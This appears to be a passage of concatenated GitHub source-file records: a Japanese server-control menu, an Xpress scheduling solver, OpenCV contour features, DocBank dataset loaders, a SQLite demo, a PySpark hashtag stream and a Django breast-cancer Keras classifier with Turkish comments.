(外のネットワークから参加するために必要です。)\"+global_ip)\n input()\ndef control_server():\n while True:\n print(\"\\nモードを選択してください。\\n\",\n \"サーバー起動モード[run]\\n\",\n \"サーバーポート変更モード[change-port]\\n\",\n \"shとbatファイル作成[sh],[bat]\\n\",\n \"ネットワークの情報確認モード[network]\\n\",\n \"最大参加人数の変更モード,[max-player]\\n\",\n \"スタートアップ(Windows)、Systemd(*Linux)での自動起動の設定モード[add-startup]\\n\",\n \"スタートアップ(Windows)、Systemd(*Linux)での自動起動の解除モード[del-startup]\\n\",\n \"プロキシモード(テスト版)[proxy]\\n\",\n \"戻る | Exit (exit)\\n\",\n \"[R,C-P,S,B,N,M,A,D,P,E]: \", end=\"\")\n choice = input().lower()\n if choice in [\"run\", \"ru\", \"r\"]:\n start_server()\n elif choice in[\"c\", \"ch\", \"cha\", \"chan\", \"chang\",\"change\", \"change-\", \"change-p\", \"change-po\", \"change-por\", \"change-port\", \"port\"]:\n change_port()\n elif choice in[\"sh\", \"s\"]:\n make_sh()\n elif choice in[\"bat\", \"ba\", \"b\"]:\n make_sh()\n elif choice in[\"network\", \"networ\", \"netwo\", \"netw\", \"net\", \"ne\", \"n\"]:\n network_info()\n elif choice in[\"max-player\", \"max-playe\", \"max-play\", \"max-pla\", \"max-pl\", \"max-p\", \"max-\", \"max\", \"ma\", \"m\"]:\n change_max_player()\n elif choice in[\"add-startup\", \"add-startu\", \"add-start\", \"add-star\", \"add-sta\", \"add-st\", \"add-s\", \"add-\", \"add\", \"ad\", \"a\"]:\n add_startup()\n elif choice in[\"del-startup\",\"del-startu\",\"del-start\",\"del-star\",\"del-sta\",\"del-st\",\"del-s\",\"del-\",\"del\",\"de\",\"d\"]:\n del_startup()\n elif choice in [\"proxy\", \"prox\", \"pro\", \"pr\", \"p\"]:\n proxy()\n elif choice in[\"exit\", \"exi\", \"ex\", \"e\"]:\n break\n else:\n 
print(\"その項目はありません。\")\n","repo_name":"stsaria/Autoer-1","sub_path":"src/Server/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":13669,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"74464619209","text":"from itertools import combinations\nimport xpress as xp\n\nimport numpy as np\n\n\nclass Solver:\n\n def __init__(self, accs, intervals):\n self.accs = accs\n self.accsNum = len(accs)\n self.intervals = intervals\n self.intNum = len(intervals)\n self.matches = np.array(list(combinations(self.accs, 2)))\n\n self.p = xp.problem()\n self.x = np.array([[[xp.var(vartype=xp.binary) for _ in intervals] for _ in accs] for _ in self.accs])\n self.m = np.array([xp.var(vartype=xp.binary) for _ in self.matches])\n\n self.p.addVariable(self.x, self.m)\n\n def set_constraints(self):\n # t is the index of the time period\n\n for acc in self.accs:\n # no self colab\n for t in range(self.intNum):\n self.p.addConstraint(self.x[acc.index, acc.index, t] == 0)\n\n self.p.addConstraint(xp.Sum(self.m[k] for k in self.get_acc_matches(acc)) <= 1)\n\n # colab with only one for each interval\n for acc_A in self.accs:\n for t in range(self.intNum):\n self.p.addConstraint(\n xp.Sum(self.x[acc_A.index, acc_B.index, t] for acc_B in self.accs) <= 1\n )\n\n k = 0\n for match in self.matches:\n acc_A, acc_B = match[0], match[1]\n self.p.addConstraint(\n xp.Sum(self.x[acc_A.index, acc_B.index, t] for t in range(self.intNum)) <= self.m[k]\n )\n k += 1\n\n def get_acc_matches(self, acc):\n indexes = []\n k = 0\n for match in self.matches:\n if acc.index == match[0].index or acc.index == match[1].index:\n indexes.append(k)\n k += 1\n\n return indexes\n","repo_name":"andygaspar/Natalia","sub_path":"Solver/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5594543740","text":"import numpy as np\r\nimport cv2\r\nimport math\r\nfrom scipy import ndimage\r\nfrom scipy.ndimage import interpolation as inter\r\nim = cv2.imread('binary3.png',0)\r\nnpim=np.array(im)\r\n\r\nnp1d=np.ndarray.flatten(im)\r\n\r\n#Calculate the center of gravity of image\r\n\r\ncog=ndimage.measurements.center_of_mass(npim)\r\n\r\n#Calculate the entropy of the image\r\n\r\ndef entropy(signal):\r\n '''\r\n function returns entropy of a signal\r\n signal must be a 1-D numpy array\r\n '''\r\n lensig=signal.size\r\n symset=list(set(signal))\r\n numsym=len(symset)\r\n propab=[np.size(signal[signal==i])/(1.0*lensig) for i in symset]\r\n ent=np.sum([p*np.log2(1.0/p) for p in propab])\r\n return ent\r\n\r\nentr=entropy(np1d)\r\n\r\n\r\n#Finding contours of the image\r\n\r\nimage, contours, hierarchy = cv2.findContours(im,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n#The first contour\r\n\r\ncon=contours[0]\r\n\r\n#Finding the rightmost contour point\r\n\r\nmaxi=0\r\nmaxj=0\r\n\r\nfor i in range(1,len(contours)):\r\n c=contours[i].reshape(-1)\r\n c=c.flatten()\r\n #print(len(c))\r\n for j in range(0,len(c)):\r\n if(j%2==0):\r\n if(c[j]>maxi):\r\n maxi=c[j]\r\n maxj=c[j+1]\r\n\r\n#Finding the bottom most contour point\r\n\r\nbottompointy=0\r\nbottompointx=0\r\n\r\nhighestpointy=200\r\n\r\nfor i in range(0,len(contours)):\r\n c=contours[i].reshape(-1)\r\n c=c.flatten()\r\n #print(len(c))\r\n for j in range(0,len(c)):\r\n if(j%2==1):\r\n if(c[j]>bottompointy):\r\n bottompointy=c[j]\r\n bottompointx=c[j-1]\r\n if(c[j] Union[pd.DataFrame, lp.Layout]:\n \"\"\"Load data annotations as a dataframe\n\n Args:\n filename (str): the abspath to the txt file\n cleanup (bool, optional):\n Whether to cleanup the annotation files, i.e., dropping\n \"##LTLine##\" and \"##LTFigure##\" from the annotation file\n Defaults to True.\n export_layout (bool, optional):\n Whether to convert the output format as lp.Layout format.\n Defaults to True.\n\n Returns:\n Union[pd.DataFrame, lp.Layout]:\n When export_layout=true, return a lp.Layout including all tokens\n Otherwise return a DataFrame.\n Note: the file could be empty.\n \"\"\"\n if os.stat(filename).st_size == 0:\n # Check empty file\n if export_layout:\n return lp.Layout([])\n else:\n return self._empty_df\n\n df = pd.read_csv(filename, sep=\"\\t\", header=None, encoding=\"utf-8\", quoting=3)\n df.columns = [\"text\", \"x_1\", \"y_1\", \"x_2\", \"y_2\", \"R\", \"G\", \"B\", \"font\", \"type\"]\n df[\"text\"] = df[\"text\"].astype(\"str\")\n df = df.reset_index()\n\n if cleanup:\n # Drop all ltline and ltfigure tokens\n df = df[(df[\"text\"] != \"##LTLine##\") & (df[\"text\"] != \"##LTFigure##\")]\n\n if export_layout:\n\n def convert_row_to_rectbox(row):\n rectbox = lp.TextBlock(\n lp.Rectangle(row[\"x_1\"], row[\"y_1\"], row[\"x_2\"], row[\"y_2\"]),\n text=row[\"text\"],\n type=row[\"type\"],\n id=row[\"index\"],\n )\n rectbox.font = row[\"font\"]\n return rectbox\n\n layout = df.apply(convert_row_to_rectbox, axis=1).tolist()\n return lp.Layout(layout)\n else:\n return df\n\n def get_text_anno_path(self, name: str) -> str:\n return os.path.join(self.text_path, name + \".txt\")\n\n def get_image_path(self, name: str) -> str:\n return os.path.join(self.image_path, name + \"_ori.jpg\")\n\n def __getitem__(\n self, idx: int\n ) -> Tuple[str, Union[pd.DataFrame, lp.Layout], Optional[\"Image\"]]:\n \"\"\"Return the name, layout, and image for an item in the dataset.\n\n Returns:\n Tuple[str, Union[pd.DataFrame, lp.Layout], 
Optional[Image]]:\n the filename of the given item,\n the token info and category annotation\n the image of the file (when self.load_image==True)\n \"\"\"\n\n name = self.all_index[idx]\n\n text_anno_name = self.get_text_anno_path(name)\n text_anno = self.load_annotations(\n text_anno_name, self.cleanup_annotations, self.export_layout\n )\n\n if not self.load_image:\n return name, text_anno\n\n image_anno_name = self.get_image_path(name)\n image = Image.open(image_anno_name)\n w, h = image.size\n text_anno = text_anno.scale((w / 1000, h / 1000))\n # scale the text annotaiton to image size\n return name, text_anno, image\n\n\nclass DocBankBlockClassificationDataset(Dataset):\n def __init__(\n self,\n base_path: str,\n subset: str,\n filename: str = None,\n select_n=None,\n select_ratio=None,\n encode_first=False,\n ):\n \"\"\"A dataloader for the DocBank Block Classification Dataset.\n\n The directory structure is shown as follows:\n\n `base_path`\n ├───dev.json\n ├───train.json\n └───test.json\n\n This dataset is used for training the block text classification model\n in the pipeline method. It is generated by using the blocks predicted by\n visual layout detection models. These models generate block level bounding\n boxes, and we use these blocks for grouping tokens from the docbank dataset.\n It is generated by the xxx.py script, and all the token data is stored in the\n JSON files for better IO performance.\n\n The JSON contains the following fields:\n\n {\n \"data\": a list of block text data, specified below,\n \"labels\": a dict used (label_id, label_name) for the data,\n \"problematic_items\": optional, see below\n }\n\n As for each data item, it is saved as:\n {\n \"words\": a list of words in the text block,\n \"bbox\": a list of block bounding boxes for all words,\n \"labels\": the label_id for this block.\n }\n\n\n Note: Sometimes we might have some tokenization bugs from the dataset. To avoid it from\n disrupting the training process, we can identify these item indices before training and\n excluding them from being loaded during training. 
These indices are stored in the JSON\n as well, under the field \"problematic_items\".\n\n Args:\n base_path (str):\n The basepath of the docbank dataset folder.\n subset (str):\n The name of the used subset, in \"train\", \"dev\", or \"test\".\n select_n (int, optional):\n The number of instances will be used during training.\n Defaults to None.\n select_ratio (float, optional):\n The fraction of dataset will be used during training.\n Defaults to None.\n filename (str, optional):\n By default, the loading filename will be the same as the `base_path`/`subset`.json.\n But you could set it specifically to override the default filename: `base_path`/`filename`.json\n Defaults to None.\n encode_first (bool, optional):\n Whether to encode the dataset ahead.\n Defaults to False.\n \"\"\"\n\n # TODO: Update the filename and link in the docstring\n\n self.base_path = base_path\n\n self.filename = f\"{base_path}/{subset}.json\"\n if filename is not None:\n self.filename = f\"{base_path}/{filename}\"\n print(f\"Loading from {self.filename}\")\n raw_data = _load_json(self.filename)\n\n _data = raw_data[\"data\"]\n self.labels = raw_data[\"labels\"]\n\n self._data = []\n for ele in _data:\n if ele != {} and len(ele[\"words\"]) == len(ele[\"bbox\"]):\n ele[\"words\"] = [str(word) for word in ele[\"words\"]]\n self._data.append(ele)\n\n self._all_indices = list(range(len(self._data)))\n\n error_idx = self.index_or_load_problematic_items(raw_data)\n\n print(f\"Dropping problematic items {error_idx}\")\n for ele in sorted(error_idx, reverse=True):\n # Remove the problematic indices\n # Start from the last to avoid indices shift in the loop\n del self._all_indices[ele]\n\n if select_n is not None:\n self._all_indices = random.sample(self._all_indices, select_n)\n elif select_ratio is not None:\n self._all_indices = random.sample(\n self._all_indices, int(len(self._all_indices) * select_ratio)\n )\n\n self.encode_first = encode_first\n self._encoded_data = None\n del raw_data\n\n def __getitem__(self, idx):\n if not self.encode_first:\n return self._data[self._all_indices[idx]]\n else:\n if self._encoded_data is None:\n raise ValueError(\"Please run self.encode_data(tokenizer) first\")\n return self._encoded_data[idx]\n\n def __len__(self):\n return len(self._all_indices)\n\n def index_or_load_problematic_items(self, raw_data: Dict) -> List[int]:\n if \"problematic_items\" not in raw_data:\n print(\"problematic_items are not loaded.\")\n error_idx = []\n else:\n print(\"Loading problematic items from file\")\n error_idx = raw_data.get(\"problematic_items\", [])\n return error_idx\n\n def encode_data(self, tokenizer):\n\n self._encoded_data = []\n\n for idx in tqdm(self._all_indices):\n self._encoded_data.append(tokenizer.encode_plus([self._data[idx]]))\n\n\nclass DocBankBlockEmbeddingDataset(DocBankBlockClassificationDataset):\n \"\"\"\"\"\"\n\n LONG_PASSAGE_THRESHOLD = 752\n MAX_SEQ_LEN = 512\n MAX_BLOCK_EMBEDDING_NUMBER = 32\n\n def __init__(\n self,\n base_path: str,\n subset: str,\n filename: str = None,\n select_n=None,\n select_ratio=None,\n encode_first=False,\n add_class_weight=False,\n ):\n \"\"\"A dataloader for the DocBank Block Embedding Dataset.\n\n This dataset is used for training the block embedding LayoutLM model\n It is generated similar to `DocBankBlockClassificationDataset`.\n\n Different from DocBankBlockClassificationDataset, for each data item,\n it stores all text for a page, and also includes a new field call block_ids:\n {\n \"words\": a list of words for the whole page,\n 
\"bbox\": a list of block bounding boxes for all words,\n \"labels\": a list of label_ids for all tokens,\n \"block_ids\": the block ids for each token on this page\n }\n\n Args:\n base_path (str):\n The basepath of the docbank dataset folder\n subset (str):\n The name of the used subset, in \"train\", \"dev\", or \"test\".\n select_n (int, optional):\n The number of instances will be used during training.\n Defaults to None.\n select_ratio (float, optional):\n The fraction of dataset will be used during training.\n Defaults to None.\n filename (str, optional):\n By default, the loading filename will be the same as the `base_path`/`subset`.json.\n But you could set it specifically to override the default filename: `base_path`/`filename`.json\n Defaults to None.\n encode_first (bool, optional):\n Whether to encode the dataset ahead.\n Defaults to False.\n add_class_weight (bool, optional):\n Whether to encode the dataset ahead.\n Defaults to False.\n \"\"\"\n self.base_path = base_path\n\n self.filename = f\"{base_path}/{subset}.json\"\n if filename is not None:\n self.filename = f\"{base_path}/{filename}\"\n print(f\"Loading from {self.filename}\")\n raw_data = _load_json(self.filename)\n\n self.labels = raw_data[\"labels\"]\n self.files = raw_data.get('files')\n\n self._data = raw_data[\"data\"]\n self._all_indices = list(range(len(self._data)))\n\n error_idx = self.index_or_load_problematic_items(raw_data)\n\n print(f\"Dropping problematic items {error_idx}\")\n for ele in sorted(error_idx, reverse=True):\n # Remove the problematic indices\n # Start from the last to avoid indices shift in the loop\n del self._all_indices[ele]\n\n # NEW IN THIS CLASS\n print(\"Dropping pages of many blocks\")\n self._all_indices = [\n ele\n for ele in self._all_indices\n if max(self._data[ele][\"block_ids\"]) + 1 < self.MAX_BLOCK_EMBEDDING_NUMBER\n ]\n # Because 0 is reserved for \"tokens not in any blocks\"\n\n if select_n is not None:\n self._all_indices = random.sample(self._all_indices, select_n)\n elif select_ratio is not None:\n self._all_indices = random.sample(\n self._all_indices, int(len(self._all_indices) * select_ratio)\n )\n\n self.encode_first = encode_first\n self._encoded_data = None\n\n self.add_class_weight = add_class_weight\n if self.add_class_weight:\n results = list(\n itertools.chain.from_iterable(\n [self._data[idx][\"labels\"] for idx in self._all_indices]\n )\n )\n cnts = Counter(results)\n freq = torch.Tensor([cnts[i] for i in range(len(self.labels))])\n self.class_weight = -torch.log(freq / freq.sum())\n\n n_gpus = torch.cuda.device_count()\n if n_gpus > 1:\n self.class_weight = self.class_weight.unsqueeze(0).repeat(n_gpus, 1)\n\n del raw_data\n\n def __getitem__(self, idx):\n\n item = self._data[self._all_indices[idx]]\n word_count = len(item[\"words\"])\n\n # For longer articles, BERT will only select the first 512 tokens.\n # To expose the model with the tailing text in these longer passages,\n # we randomly sample the starting point.\n\n if word_count > self.LONG_PASSAGE_THRESHOLD:\n start = random.choice([0, word_count - self.MAX_SEQ_LEN])\n item = {key: val[start:word_count] for key, val in item.items()}\n\n if self.add_class_weight:\n item[\"class_weight\"] = self.class_weight\n return item\n\nclass DocBankImageFeatureDataset(DocBankBlockEmbeddingDataset):\n\n def __init__(\n self,\n base_path: str,\n subset: str,\n image_directory=str,\n filename: str = None,\n select_n=None,\n select_ratio=None,\n encode_first=False,\n add_class_weight=False,\n ):\n\n 
super().__init__(\n base_path = base_path,\n subset = subset,\n filename = filename,\n select_n = select_n,\n select_ratio = select_ratio,\n encode_first = encode_first,\n add_class_weight = add_class_weight,\n )\n\n self.image_directory = image_directory\n\n def __getitem__(self, idx):\n\n item = super().__getitem__(idx)\n \n image_filename = self.files[self._all_indices[idx]].replace('.txt', '_ori.jpg')\n image = cv2.imread(f\"{self.image_directory}/{image_filename}\")\n\n item['image'] = image\n return item","repo_name":"rayfok/scim-nlp","sub_path":"scienceparseplus/src/scienceparseplus/datasets/docbank.py","file_name":"docbank.py","file_ext":"py","file_size_in_byte":17400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"38877900287","text":"import sys\ninput = sys.stdin.readline\n# input\nN, L = map(int, input().split())\nroad = [None for _ in range(L + 1)]\nfor _ in range(N):\n\td, r, g = map(int, input().split())\n\troad[d] = (r, g)\n# process\n'''\nmax(N)=max(R)=100, max(L)=1000이므로 \n상근이의 최대 대기시간은 10000초 + 이동시간은 1000초.\n'''\ncur = 1\ntime = 0\nwhile cur < L:\n\t# 지금 위치에 신호등이 없을 경우 움직임\n\tif road[cur] is None: cur += 1\n\t# 신호등이 있으면\n\telse:\n\t\tr, g = road[cur]\n\t\t# 초록불일 경우 움직임\n\t\tif not 0 <= time % (r + g) < r: cur += 1\n\ttime += 1\t\n# output\nprint(time)","repo_name":"WaiNaat/BOJ-Python","sub_path":"2980.py","file_name":"2980.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"35840077812","text":"import numpy as np \nimport matplotlib.pyplot as plt \n\n\nclass fisher_discriminator():\n def __init__(self, fname_train):\n self.training_data = self.load_data(fname_train)\n\n # self.class_covariances = None\n # self.class_means = self.calc_means()\n # self.class_determinants = None\n\n\n def train(self,):\n covs = self.calc_covariances()\n\n return\n\n\n def calc_means(self,):\n means = {}\n\n for key in self.training_data.keys():\n mu = np.sum(self.training_data[key], axis=0) # sum over data\n mu = mu / self.training_data[key].shape[0] # divide by N\n means[key] = mu\n\n print(means)\n return means\n\n\n def calc_covariances(self,):\n covs = {}\n means = self.calc_means()\n\n for key in means.keys():\n covs[key] = np.matmul(self.training_data[key].T, self.training_data[key])\n print(covs[key].shape)\n\n return covs\n\n\n def calc_determinants(self,):\n dets = {}\n covs = self.calc_covariances()\n\n for key in covs.keys():\n dets[key] = np.linalg.det(covs[key])\n print(dets[key])\n\n return\n\n\n def load_data(self, fname):\n data_raw = np.genfromtxt(fname, delimiter=' ')\n data = {i : [] for i in range(0, 10)}\n\n for row in data_raw:\n data[int(row[0])].append(row[1:])\n\n for key in data.keys():\n data[key] = np.array(data[key])\n\n return data\n\n\ndef main():\n fd = fisher_discriminator('zip.train')\n fd.calc_determinants()\n means = fd.calc_means()\n print(means)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rrtroutslater/stat_learning","sub_path":"fisher_discriminator/fisher_discriminator.py","file_name":"fisher_discriminator.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"72839191687","text":"# Import SQLITE\nimport sqlite3\n\ndef tableExists(con, tableName):\n cur = con.cursor()\n # Zkus...\n try:\n # Ziskat pocet tabulek s nazvem 'tableName' ze specialni tabulky sqlite_master\n cur.execute(\"SELECT COUNT(*) FROM sqlite_master WHERE type=? AND name=?;\", ('table', tableName))\n except sqlite3.Error as e:\n # Ooops, neco se nepovedlo, napis, kde je problem a skocni\n print(\"SQL Error: {0}\".format(e))\n exit(1)\n r = cur.fetchone()\n # Vrat True, pokud SQL dotaz nasel prave jeden zaznam (tzn. tabulka 'tableName' existuje),\n # nebo False, pokud SQL dotaz nenasel nic (tzn. tabulka 'tableName' neexistuje)\n return r[0] == 1\n\ndef createMyTable(con):\n cur = con.cursor()\n # Zkus ...\n try:\n # Vytvorit tabulku mytable\n cur.execute(\"CREATE TABLE mytable (id INTEGER PRIMARY KEY AUTOINCREMENT, name VARCHAR(60), date DATETIME);\")\n except sqlite3.Error as e:\n # Ooops, neco se nepovadlo, napis, kde je problem a skonci\n print(\"SQL Error: {0}\".format(e))\n exit(1)\n\n\n# Otevri nasi databazi\ncon = sqlite3.connect('mydb.sqlite')\n# Ziskej kurzor, \"ukazatel\" do nasi databaze\ncur = con.cursor()\n\n# Zkontroluj, jestli tabulka uz existuje a kdyz ne, tak ji vytvor\nif not tableExists(con, 'mytable'):\n createMyTable(con)\n\n# Zeptej se na jmeno\nname = input(\"Zadej jmeno: \")\n\n# Zkus...\ntry:\n # Vloz do tabulky zadane jmeno a aktualni datum a cas\n cur.execute(\"INSERT INTO mytable (name, date) VALUES(?, datetime('now'));\", (name,));\nexcept sqlite3.Error as e:\n # Kdyz se to nepovede, tak vypis proc a skonci\n print(\"SQL Error: {0}\".format(e))\n exit(1)\n\n# Vsechno se povedlo, ukonci transakci a data fyzicky uloz do databaze (na disk)\ncon.commit()\n\n# Vyber vsechny zaznamy z tabulky\nres = cur.execute(\"SELECT id, name, date FROM mytable ORDER BY date DESC;\")\n\n# Vezmi jeden zaznam z 'res' (vysledku')\nrow = res.fetchone()\n# Opakuj, dokud row neni None (prazdny)\nwhile row != None:\n # Vypis jmeno a datum z aktualniho zaznamu\n print(\"ID: {id:<5} Name: {name:10} Date: {date}\".format(id = row[0], name=row[1], date=row[2]))\n # Posun se na dalsi zaznam z tabulky\n row = res.fetchone()\n\n# Ukonci spojeni s databazi a skonci\ncon.close()\n","repo_name":"danvratil/dapraha-flask","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"10417312929","text":"# May cause deprecation warnings, safe to ignore, they aren't errors\nfrom pyspark import SparkContext\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.functions import desc\n# Can only run this once. restart your kernel for any errors.\nsc = SparkContext()\n\nssc = StreamingContext(sc, 10 )\nsqlContext = SQLContext(sc)\nsocket_stream = ssc.socketTextStream(\"127.0.0.1\", 5555)\nlines = socket_stream.window( 20 )\nfrom collections import namedtuple\nfields = (\"tag\", \"count\" )\nTweet = namedtuple( 'Tweet', fields )\n# Use Parenthesis for multiple lines or use \\.\n( lines.flatMap( lambda text: text.split( \" \" ) ) #Splits to a list\n .filter( lambda word: word.lower().startswith(\"#\") ) # Checks for hashtag calls\n .map( lambda word: ( word.lower(), 1 ) ) # Lower cases the word\n .reduceByKey( lambda a, b: a + b ) # Reduces\n .map( lambda rec: Tweet( rec[0], rec[1] ) ) # Stores in a Tweet Object\n .foreachRDD( lambda rdd: rdd.toDF().sort( desc(\"count\") ) # Sorts Them in a DF\n .limit(10).registerTempTable(\"tweets\") ) ) # Registers to a table.","repo_name":"JacobMonksRev/BigData05312022","sub_path":"Notes/Week9/Twitter_Stream/spark_st_run.py","file_name":"spark_st_run.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"}
+{"seq_id":"20436454649","text":"from django.shortcuts import render,HttpResponse,redirect,get_object_or_404\nfrom .models import Cancer\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nimport keras\nfrom keras.layers import Input, Dense\nfrom keras.optimizers import SGD\nfrom sklearn.impute import SimpleImputer\nimport numpy as np\nimport pandas as pd\n# from .myform import MyForm\n# Create your views here.\ndef index(request):\n return render(request, \"index.html\")\n\ndef features(request):\n return render(request, \"features.html\")\n\ndef price(request):\n return render(request, \"pricing.html\")\n\ndef blog(request):\n return render(request, \"blog.html\")\n\ndef contact(request):\n return render(request, \"contact.html\")\n\ndef cancer(request):\n cancers = Cancer.objects.all()\n\n return render(request, \"test.html\",{\"cancers\":cancers})\n\ndef addCancer(request):\n # f = MyForm()\n if request.method == \"GET\":\n return redirect(\"/cancer\")\n else:\n # Hasta Kişisel Bilgileri\n tc = request.POST.get(\"tc\")\n firstName = request.POST.get(\"firstName\")\n lastName = request.POST.get(\"lastName\")\n length = request.POST.get(\"length\")\n age = request.POST.get(\"age\")\n sex = request.POST.get(\"sex\")\n city = request.POST.get(\"city\")\n country = request.POST.get(\"country\")\n # ************Yapay Zeka Alanı****************\n # verilerimizi okuyup değişkenimizin içine atıyorum\n veri = pd.read_csv(\"datasets/breast-cancer.data\")\n # verisetimizde bulunan \"?\" yani bilinmeyen kısımları hesaplanmaması için -99999 gibi bir değer veriyorum\n veri.replace('?', -99999, inplace=True)\n veriyeni = veri.drop(['1000025'], axis=1)\n imp = SimpleImputer(missing_values=-99999, strategy=\"mean\", fill_value=None, verbose=0, copy=True)\n veriyeni = imp.fit_transform(veriyeni) # sklearn\n # 8 adet özelliğe bağlı bir giriş katmanımız var \n # (Hücre Boyutunun Düzgünlüğü, Hücre Şeklinin Düzgünlüğü, Marjinal Yapışma, Tek Epitel Hücre Boyutu,\n # Çıplak Çekirdekler, Uyumlu Kromatin, Normal Nikloeller, Normal Nikloeller, Mitoz)\n # bu 8 katmana göre 1 tane veriyi tahmin etmeye çalışıyoruz\n giris = veriyeni[:, 0:8] # giris.shape => (698,8) 8 özelliğe bağlı giriş katmanımız\n cikis = veriyeni[:, 9] # cikis.shape => 8 özellikten tahmin ettiğimiz çıkış katmanımız\n # *** VERİ SETİ İŞLEMLERİ TAMAM ŞİMDİ MODELİMİZİ OLUŞTURALIM\n # bu altta vereceğim fotoğraf sequential le alakalı sunumda felan kullanıp 63 ve 64.satırları sil\n # https://bilimfili.com/wp-content/uploads/2015/12/yapay-sinir-aglari1-bilimfilicom.jpg\n model = Sequential() # Yapay sinir ağları algılayıcıların ardışık olmasına bağlı \n # Dense: yapay sinir ağında görülen her ağ kendinden sonraki noktalara bağlı\n # input dimension ' a kaç tane özelliğimiz olduğunu yazıyoruz biz 8 özellikten output u tahmin edeceğiz\n model.add(Dense(10, input_dim=8))\n # Aktivasyon fonksiyonuna sokalım\n # Step Fonksiyonu: Bir eşik değeri alarak ikili bir sınıflandırma çıktısı (0 yada 1) üretir.\n # Sigmoid Fonksiyonu: En yaygın kullanılan aktivasyon fonksiyonlarından birisidir, [0,1] aralığında çıktı üretir.\n # Tanh Fonksiyonu: [-1,1] aralığında çıktı üreten doğrusal olmayan bir fonksiyondur.\n # ReLU Fonksiyonu: Doğrusal olmayan bir fonksiyondur. 
ReLU fonksiyonu negatif girdiler için 0 değerini alırken, x pozitif girdiler için x değerini almaktadır.\n # Softmax Fonksiyonu: Çoklu sınıflandırma problemleri için kullanılan bu fonksiyon, verilen her bir girdinin bir sınıfa ait olma olasılığını gösteren [0,1] arası çıktılar üretmektedir.\n # Softplus Fonksiyonu: Sigmoid ve Tanh gibi geleneksel aktivasyon fonksiyonlarına alternatif olarak sunulan bu fonksiyon (0, +∞) aralığında türevlenebilir bir çıktı üretmektedir.\n # ELU Fonksiyonu: Üstel lineer birim, negatif girdiler hariç ReLU ile benzerdir. Negatif girdilerde ise genellikle 1.0 alınan alfa parametresi almaktadır.\n # PReLU Fonksiyonu: Parametrik ReLU olarak geçen bu aktivasyon fonksiyonu da negatif girdiler için extra alfa sabiti ile verilen girdinin çarpım sonucunu çıktı olarak üretmektedir.\n # Swish Fonksiyonu: Google araştırmacıları tarafından yeni keşfedilen bu fonksiyon girdiler ile sigmoid fonksiyonunun çarpımını çıktı olarak üretmektedir.\n # İlk başta hidden layers kısmını yazdık şimdi aktivasyon fonksiyonuyla verilerimizi normalize ettik yani 0-1 arasına yerleştirdik\n # NEDEN RELU yu kullandık?\n # Matrislerde sürekli y = mx + b işlemi çalışacağı için çok yüksek değerler elde ediyoruz biz bunu belli bir değer arasına sokmamız lazım\n # bunun için aktivasyon fonksiyonu kullanıyoruz verilerimizi 0 ile 1 arasına sokuyoruz \n model.add(Activation('relu')) # model.add(Activation('tanh')) daha hızlı sonuç verdi\n # Katmandaki node ların yarısını o tekrar içine sokmuyor eğer 0.2 yazılırsa 5'te 1 ini o tekrar için işleme sokmaz.\n # farklı node ları işleme sokmamızın nedeni veri seti ezberinin önüne geçmek için yapıyoruz \n # eğer dropout kullanmazsak tahminimiz %100 olur fakat bu ezberlenmiş bir model demektir bizim için makul değer %90-%95 \n model.add(Dropout(0.5))\n model.add(Dense(10))\n model.add(Activation('relu')) # model.add(Activation('tanh'))\n model.add(Dropout(0.5))\n model.add(Dense(10))\n model.add(Activation('softmax')) # hep en sonda tut\n # Yapay sinir ağımızı oluşturduk \n # lr: learning rate =>Ne kadar hızlı öğreneceğimizi anlamaya çalışan bir sistem\n # lr ile epoch arasında ters orantı var\n # lr yi düşük alrısak epoch değerini yüksek almamız gerekir \n optimizer = keras.optimizers.SGD(lr=0.01)\n # gerçek-tahmini karesini alıp türevini 0 a eşitliyoruz \n # algoritmamızın ne kadar doğru ne kadar yanlış yaptığını anlamak için metrics = accuracy yapıyoruz \n model.compile(optimizer=optimizer, loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n # modelimiz bitti şimdi bu verileri modele yerleştirmek kaldı \n # 2: iyi huylu tümör, 4: kötü huylu tümör\n # epochs: veri setini ayrı ayrı 10 kere tarayacak\n # batch_size: aynı anda kaç bit lik işlemi hafızaya alsın yazılmazsa kendisi otomatik değer atar.\n # validation_split: (Doğrulama kısmı) bütün verimizin bir kısmını yapay sinir ağımıza yerleştirelim\n # Elimizde kalan sinir ağına sokmadığımız işlenmemiş veriyi veri setine sokarak tahmin etmesini sağlayacağız.\n # eğer tamamıyla işleme sokarsak model verileri ezberler. 
